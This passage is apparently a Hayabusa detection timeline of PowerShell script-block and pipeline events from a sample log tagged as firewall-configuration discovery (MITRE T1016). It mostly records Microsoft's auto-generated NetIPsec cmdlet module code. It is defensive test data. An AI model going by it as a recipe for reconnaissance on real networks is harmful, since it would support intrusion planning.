'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 
'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecIdentity 
",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeSA ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
